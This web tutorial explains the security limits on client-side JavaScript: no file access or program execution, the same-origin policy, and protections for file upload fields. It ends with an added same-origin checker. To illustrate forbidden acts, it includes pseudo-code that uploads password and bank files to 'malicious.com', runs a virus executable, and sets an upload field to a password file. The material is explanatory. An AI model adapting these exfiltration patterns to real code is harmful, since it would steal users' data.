JavaScript


JavaScript and Security tutorials

  • Client–side JavaScript has expressly been developed for use in a web browser in conjunction with HTML pages. This has certain consequences for security.

  • First of all, please note carefully what happens when a user visits a JavaScript–enhanced web site: The user asks for a certain HTML page without knowing whether it contains JavaScript. The HTML page is delivered to the browser, including the scripts. The scripts usually run automatically when the page loads or when the user takes a certain action. In general the user can’t do anything to stop the scripts (well, he could turn off JavaScript, but few end users know how to do this, or that it can be done, or that JavaScript exists).

  • So basically an innocent end user downloads a random program and allows it to be executed on his machine. Therefore there should be strict rules as to what this program can and cannot do.

  • JavaScript cannot read files from or write them to the file system on the computer. This would be a clear security hazard:

filesystem.read('/my document/password/file');

filesystem.write('abcvirus.exe');

  • JavaScript cannot execute any other programs. Something like this would also be unacceptable:

execute('abcvirus.exe');

  • JavaScript cannot establish a connection to any computer, except to download a new HTML page or to send mail. This, too, would create unacceptable hazards:

var security_hazard = connection.open('malicious.com');

security_hazard.upload(filesystem.read('/my document/password/file'));

security_hazard.upload(filesystem.read('/my document/bank loans.xls'));

  • Thus JavaScript simply cannot do such dangerous things. Unfortunately Microsoft has seen fit to add some filesystem commands nonetheless, in combination with Internet Explorer and ActiveX technology. This means that Explorer on Windows is structurally less safe than any other browser. Though the latest Windows versions provide in-private browsing and some built-in protection, hackers regularly find some weaknesses.

  • So JavaScript only works on things that are in HTML pages or part of the browser. You cannot influence anything that's not contained by the browser. But even within the browser there are some no–go areas. Basically JavaScript wants to protect the privacy of the user by disallowing some actions and asking permission for others:

  • You cannot read out the history of the browser. Thus a malicious site owner cannot write a script that finds out where you surfed to recently.

  • You can go back or forward in the browsing history, but you cannot find out which page you’ll go to.

  • You cannot do anything in pages that come from another server. So if your frameset contains two pages from two servers, they cannot communicate with each other. Thus a malicious site owner cannot find out which sites you’ve opened in other browser windows. See the frame busting page for some more information.

  • You cannot set the value of a file upload field (<input type="file">):

document.forms[0].upload_field.value = '/my/password/file';

document.forms[0].submit();

  • If you try to close a browser window that has not been opened by JavaScript, the user is asked to confirm this action. However, this rule isn't implemented in all browsers and is easy to work around in Explorer.

  • If you try to submit a form to a mail address by JavaScript, the user is asked to confirm this action.

  • You should not be able to open a new window smaller than 100x100 pixels and/or to position it outside the screen area of the computer. Thus a malicious site owner cannot spawn an invisible window. Note that Internet Explorer, and maybe other browsers too, does allow this, contrary to safety regulations.
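
The rule above that pages from different servers cannot communicate is decided per origin: scheme, host and port must all match. The following is an added example, not part of the original tutorial, that reports which pages in a constructed frameset share an origin; the function names and sample URLs are assumptions made for illustration.

```javascript
// Added example: same-origin comparison as browsers define it.
// An origin is the tuple (scheme, host, port); two pages may script each
// other only when all three match.

function originOf(url) {
  const u = new URL(url);
  // URL.origin is the string "null" for schemes with opaque origins
  // (data:, file:, ...). An opaque origin never equals any other origin.
  return u.origin === 'null' ? null : u.origin;
}

function sameOrigin(a, b) {
  let oa, ob;
  try {
    oa = originOf(a);
    ob = originOf(b);
  } catch (e) {
    return false; // unparseable URL: fail closed
  }
  return oa !== null && ob !== null && oa === ob;
}

// Given the pages loaded in a frameset, list which pairs may communicate.
function accessiblePairs(pages) {
  const pairs = [];
  for (let i = 0; i < pages.length; i++) {
    for (let j = i + 1; j < pages.length; j++) {
      if (sameOrigin(pages[i], pages[j])) pairs.push([pages[i], pages[j]]);
    }
  }
  return pairs;
}

// Constructed sample frameset (example.com hosts are placeholders).
const frames = [
  'https://shop.example.com/cart',
  'https://shop.example.com:443/checkout', // default port, same origin
  'http://shop.example.com/cart',          // different scheme
  'https://pay.example.com/form',          // different host
  'https://shop.example.com:8443/admin',   // different port
  'data:text/html,<p>inline</p>',          // opaque origin
];

console.log(accessiblePairs(frames));
```

Only the first two pages are reported as able to communicate; a differing scheme, host or port, or an opaque origin, is enough to separate the rest.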

 
